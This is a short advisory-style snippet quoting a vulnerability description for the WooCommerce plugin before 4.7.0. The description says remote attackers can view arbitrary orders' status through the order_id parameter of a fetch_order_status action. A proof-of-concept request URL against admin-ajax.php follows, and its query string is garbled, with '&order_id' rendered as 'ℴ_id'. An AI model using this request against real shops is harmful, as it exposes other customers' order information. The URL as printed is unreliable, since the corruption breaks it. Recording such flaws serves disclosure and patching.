“The WooCommerce plugin before 4.7.0 for WordPress allows remote attackers to view the status of arbitrary orders via the order_id parameter in a fetch_order_status action.”
https://example.com/wp-admin/admin-ajax.php?action=fetch_order_statusℴ_id=XX